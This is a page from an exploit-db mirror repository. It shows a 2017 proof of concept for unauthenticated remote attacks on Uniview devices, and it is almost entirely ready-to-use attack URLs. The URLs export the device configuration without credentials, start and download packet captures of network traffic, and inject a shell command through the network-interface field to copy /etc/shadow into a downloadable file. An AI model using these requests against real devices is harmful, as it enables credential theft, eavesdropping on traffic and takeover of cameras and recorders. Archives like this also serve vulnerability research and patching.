bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/43999.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

34 lines
No EOL
1.2 KiB
Text
Raw Permalink Blame History

[STX]
Subject: Uniview RCE and export config PoC
Researcher: bashis <mcw noemail eu> (October 2017)
Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
[Export config]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1}
-[tcpdump]-
[check active capture]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":263,"szUserName":"","u32UserLoginHandle":-1}
[start capture]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":264,"status":1,"bSelectAllPort":1,"stSelPort":0,"bSelectAllIp":1,"stSelIp":0,"stSelNicName":"eth0"}
[stop capture]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":264,"status":0,"bSelectAllPort":1,"stSelPort":0,"bSelectAllIp":1,"stSelIp":0,"stSelNicName":"eth0"}
[download capture]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":265,"szUserName":"","u32UserLoginHandle":-1}
-[Remote Command Execution]-
[Get /etc/shadow]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":264,"status":1,"bSelectAllPort":1,"stSelPort":0,"bSelectAllIp":1,"stSelIp":0,"stSelNicName":";cp%20/etc/shadow%20/tmp/packetcapture.pcap;"}
[get the result]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":265,"szUserName":"","u32UserLoginHandle":-1}
[ETX]
Reference in a new issue View git blame Copy permalink